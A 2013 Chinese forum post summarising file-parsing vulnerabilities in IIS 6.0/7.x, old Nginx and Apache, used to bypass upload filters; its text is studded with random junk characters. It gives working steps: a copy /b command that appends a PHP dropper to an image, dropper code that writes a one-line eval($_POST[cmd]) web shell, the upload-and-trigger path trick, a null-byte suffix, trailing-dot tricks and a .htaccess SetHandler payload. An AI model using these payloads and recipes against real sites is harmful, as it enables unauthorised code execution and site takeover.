找回密码
 立即注册
查看: 3709|回复: 0
打印 上一主题 下一主题

常见服务器解析漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:14:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Author : laterain9 C0 s  ^+ x! d: h6 g: b
[+]IIS6.0) Z$ x' p3 F2 b  g1 ^$ Y' |9 ~6 N

( [5 t8 E$ |* G: ~* D' s目录解析:/xx.asp/xx.jpg 0 Q" l! X- E6 j% {( T+ ^( T" ?
xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码
; m: |) z( |- B2 h IIS6.0 会将 xx.jpg 解析为 asp 文件。
+ O5 w; I; \' v: G+ \5 p0 l9 d后缀解析:/xx.asp;.jpg     
# ~: H) M! D) S IIS6.0 都会把此类后缀文件成功解析为 asp 文件。7 p3 B+ o) U4 \; O) \1 D: X
默认解析:/xx.asa! P/ Y# l/ a' V3 U8 J
         /xx.cer
) E( c% B3 p. ^( M         /xx.cdx
- M, v) P9 X) n4 @ IIS6.0 默认的可执行文件除了 asp 还包含这三种
& j2 [! k! Q- J' U' y- [, u 此处可联系利用目录解析漏洞   f: c! ~# P" c* T3 D$ A* S
/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
( D) g1 D1 ~' h4 u1 c) F[+]IIS 7.0/IIS 7.5/Nginx <0.8.034 [2 t$ Q1 U2 L

8 Q; W$ c& t+ \/ f IIS 7.0/IIS 7.5/Nginx <0.8.03
6 t* E1 s2 Z' c& { 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面+ b3 s$ n% H5 F% @9 W) d$ d3 _: o+ ~; O
加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。
% r0 Y. D  V5 w4 v3 b 常用利用方法:
/ [9 j4 N4 w2 h5 l1 L' L0 P+ a5 \4 U 将一张图和一个写入后门代码的文本文件合并将恶意文本
! @# ~2 q0 h/ j" S3 z# F/ C. d( W 写入图片的二进制代码之后,避免破坏图片文件头和尾: S0 ^) x' K) f0 U
如:
3 f8 n1 q5 Y  g0 w; T# U! H' ~' ` copy xx.jpg /b + yy.txt/a xy.jpg
/ H5 Y, M4 \* _/ p( M& q. s$ H #########################################################
! e5 R- q$ J5 W/ q, |: d( Q5 z6 D /b 即二进制[binary]模式
3 R; l# M4 A" ?6 d' C1 z; \& t /a 即ascii模式) k* J) K$ ]4 P% m
xx.jpg 正常图片文件
/ ~3 i( e9 C! u! _- q5 Q9 T yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),
2 W$ r8 P+ k7 Q* Z) U5 { '<?php eval($_POST[cmd])?>');?>: ?! T; {  D9 q6 _8 ?/ ]
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称5 a7 x, r; S% ~; F6 h8 i
为shell.php的文件
+ \* S4 {3 B- x( w$ L: d2 ]" D% \ ###########################################################
& {  B" J" E, N' c* ^ 找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php % u7 L: v; z+ q6 T6 _9 V
即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
7 p% E" k' q$ ~. U* U 密码 cmd& u& f- B. C' t. F% G+ K
[+]Nginx <0.8.03
% l; I: j* T6 i7 [/ e# k; q ; l8 z2 _3 ~+ n0 e
在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞
+ l1 _2 U; f' Q! o 在一个文件路径(/xx.jpg)后面加上%00.php
7 n: v- b. x/ J+ Y. s* a: @ 会将 /xx.jpg%00.php 解析为 php 文件。
9 [" i' |+ b: n0 F[+]Apache<0.8.03
7 k% X& L8 w" L4 L; @: z " h9 o% Z" a' K! V5 K
后缀解析:test.php.x1.x2.x3
$ C2 A# j  ~( k. c/ U5 L8 W( z+ i8 d Apache将从右至左开始判断后缀,若x3非可识别后缀,
& X2 \7 c4 f: J& |  T7 g; @ 再判断x2,直到找到可识别后缀为止,然后将该可识别  ^& {6 ~8 V/ V; }, G/ w$ P
后缀进解析test.php.x1.x2.x3 则会被解析为php& f+ {. `% D9 z+ R2 U3 B! U
经验之谈:php|php3|phtml 多可被Apache解析。8 h! O# R. `, Z) H9 s2 B& R
[+]其他一些可利用的: t1 H8 F- J: k# q0 c
3 Q0 c' Q0 Y6 I4 s: d
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的  i/ ~- e' Q' i( j: G
若这样命名,windows会默认除去空格或点,这也是可以被利用的!5 b7 \0 ^5 z7 b+ C
在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格
' a% W0 f7 t0 p' M, u或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可
( ?; y3 g- F+ r/ j4 l得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。
& a' c1 S, d( y{Linux主机中不行,Linux允许这类文件存在}
5 ]3 j  z1 d/ [4 w如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说! l1 r% V4 K- @; x/ W7 U) t' G
的,当初我并不知道),且可以被上传,那可以尝试在
% Y/ p0 O- ~, ~, }.htaccess中写入:/ z6 I& z6 V$ D% j
<FilesMatch “shell.jpg”>
0 b6 r; h% F, x# HSetHandler application/x-httpd-php 9 f7 L; Y, r& ~
</FilesMatch>
) L) ?3 n1 N( c- G3 ]3 c: `shell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件
- e. W' X$ v6 F% s# b/ j. W2 b; S+ Q[+]错误修改
& s' {1 @3 \8 Y ) i9 \9 x$ P. Z; V8 w
在 IIS 6.0 下可解析 /xx.asp:.jpg
" K4 z) |# I6 a+ n" h{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去
; G! l( A5 H2 s4 o4 V# f剩下/xx.asp}修改:4 C% N, P" [! c4 Z) P; l3 c
先谢谢核攻击的提醒
4 g/ ]5 C0 @3 S* {; }当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp! `/ T. U7 t  d! N8 H- X  `
里是没有任何内容的,因为。。不好解释 大家自己看
! V& Y" ]% P8 ?http://lcx.cc/?i=2448, ^  }% ?+ T, z
http://baike.baidu.com/view/3619593.htm
+ S# R2 P9 E) v2 @2 r% o5 J0 O% Z) z, B, u) _) B1 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表